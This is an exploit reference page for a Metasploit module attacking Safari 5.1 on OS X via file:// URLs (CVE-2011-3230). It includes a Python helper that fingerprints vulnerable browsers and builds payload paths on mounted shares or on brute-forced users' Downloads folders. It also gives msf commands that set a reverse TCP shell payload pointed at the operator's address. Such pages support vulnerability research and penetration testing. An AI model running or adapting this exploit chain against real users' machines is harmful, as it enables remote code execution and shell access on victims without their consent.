Apple Safari file:// Arbitrary Code Execution
This module exploits a vulnerability found in Apple Safari on the OS X platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution in the context of the current user. To reach code execution, the most reliable approach is to first get a share mounted on the victim machine (SMB, WebDAV, FTP, or a file format that OS X automounts) and then launch the payload from /Volumes/[share]. If some other bug leaks the victim's current username, the payload can also be launched from /Users/[username]/Downloads/; otherwise that username has to be brute-forced. Note that non-Java payloads (*.sh extension) may be opened by Xcode rather than executed; in that case, try the Java payloads instead.
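The two delivery paths described above (a mounted share under /Volumes/[share], or the user's Downloads folder once a username is known) can be illustrated with a small Python helper. This is an added example written for this page, not code from the Metasploit module: the User-Agent strings are constructed samples, the module's real client fingerprinting is not shown on this page, and the cut-off at Safari 5.1.1 is an assumption taken from the HT5000 reference (which is the Safari 5.1.1 security update).

```python
import re
from urllib.parse import quote

# Constructed sample User-Agent strings (not captured from a real engagement).
UA_SAFARI_51 = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 "
                "(KHTML, like Gecko) Version/5.1 Safari/534.48.3")
UA_SAFARI_511 = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/534.51.22 "
                 "(KHTML, like Gecko) Version/5.1.1 Safari/534.51.22")
UA_CHROME_MAC = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/535.1 "
                 "(KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1")


def safari_version(ua):
    """Return the Safari version tuple for an OS X Safari User-Agent, else None.

    Chrome also advertises 'Safari/' in its UA, so it is excluded explicitly;
    real Safari carries the product version in the 'Version/x.y' token.
    """
    if "Mac OS X" not in ua or "Chrome/" in ua:
        return None
    m = re.search(r"Version/(\d+(?:\.\d+)*) Safari/", ua)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def is_in_scope(ua):
    """True only for Safari 5.1 on OS X, the module's listed target.

    Assumption (not stated on this page): the fix shipped in Safari 5.1.1,
    so 5.1.1 and later are treated as patched.
    """
    v = safari_version(ua)
    return v is not None and v[:2] == (5, 1) and v < (5, 1, 1)


def payload_filename(target, stem="update"):
    """File name for the chosen target: target 0 is a shell script, target 1 a Java archive.

    The .jar extension for the Java target is an assumption for illustration.
    """
    return stem + (".jar" if target == 1 else ".sh")


def payload_urls(payload_name, share=None, usernames=()):
    """file:// URLs to try, in the order the description recommends.

    The mounted-share path comes first; Downloads paths follow, one per
    candidate username (a leaked name, or a brute-force list).  Names are
    percent-encoded so spaces or unusual characters do not break the URL.
    """
    urls = []
    if share:
        urls.append("file:///Volumes/%s/%s" % (quote(share), quote(payload_name)))
    for user in usernames:
        urls.append("file:///Users/%s/Downloads/%s" % (quote(user), quote(payload_name)))
    return urls


if __name__ == "__main__":
    for ua in (UA_SAFARI_51, UA_SAFARI_511, UA_CHROME_MAC):
        print(safari_version(ua), is_in_scope(ua))
    print(payload_urls(payload_filename(1), share="10.0.0.5", usernames=["bob", "alice"]))
```

The share name used under /Volumes is whatever OS X picks when it mounts the share (for an FTP mount that is typically the server host name or address), so `share` should be set to that value rather than to the attacker's chosen path.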
Exploit Rank
- Normal
Exploit Authors
- Aaron Sigel
- sinn3r < sinn3r [at] metasploit.com >
Vulnerability References
- CVE-2011-3230
- http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from...
- http://support.apple.com/kb/HT5000
Exploit Targets
- 0 - Safari 5.1 on OSX (default)
- 1 - Safari 5.1 on OSX with Java
Exploit Development
Similar Exploit Modules
- exploit/osx/browser/mozilla_mchannel
- exploit/osx/browser/safari_libtiff
- exploit/osx/browser/safari_metadata_archive
- exploit/osx/browser/software_update
Exploit Usage Information
msf > use exploit/osx/browser/safari_file_policy
msf exploit(safari_file_policy) > show payloads
msf exploit(safari_file_policy) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(safari_file_policy) > set LHOST [MY IP ADDRESS]
msf exploit(safari_file_policy) > exploit
Exploit Module Options
| Option | Description |
| --- | --- |
| HTTPPORT | The HTTP server port (default: 80) |
| SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
| SRVPORT | The local port to use for the FTP server (do not change) (default: 21) |
| SSL | Negotiate SSL for incoming connections |
| SSLCert | Path to a custom SSL certificate (default is randomly generated) |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| URIPATH | The URI to use for this exploit (default is random) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| ListenerComm | The specific communication channel to use for this service |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| TCP::max_send_size | Maximum TCP segment size (0 = disable) |
| TCP::send_delay | Delay inserted before every send (0 = disable) |
